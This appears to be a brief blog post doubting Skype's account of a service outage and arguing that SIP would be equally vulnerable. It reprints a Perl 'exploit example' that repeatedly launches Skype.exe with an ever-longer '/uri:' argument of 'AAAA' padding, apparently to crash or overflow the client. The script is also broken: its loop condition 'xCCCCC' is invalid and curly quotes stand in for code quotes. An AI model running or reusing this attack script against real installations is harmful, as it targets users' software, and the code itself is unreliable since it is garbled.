I would be Jack’s complete lack of surprise

According to the people over at Skype it’s not a DoS attack that has created the current outage.  Now why don’t I believe that? And to the people who now argue that SIP (in one of it’s many shapes or forms) would be a better choice I would like to note that SIP would be equally vulnerable to similar forms of attack.

Oh. Here’s the exploit example by the way.

#!/usr/bin/perl
# Simle Code by Maranax Porex ;D
# Ya Skaypeg!!
for ($i=256; $i>xCCCCC; $i=$i+256)
{
$eot=’AAAA’ x $i;
call_sp();
}
exit;
sub call_sp()
{
$str=”\”C:\\Program Files\\Skype\\Phone\\Skype.exe\” \”/uri:$eot\””;
system(“$str”);
}

Edit: Well, it seems that the techies over at Skype still argue that this was something other than a DoS attack. Who knows. In fact, who cares.


About this entry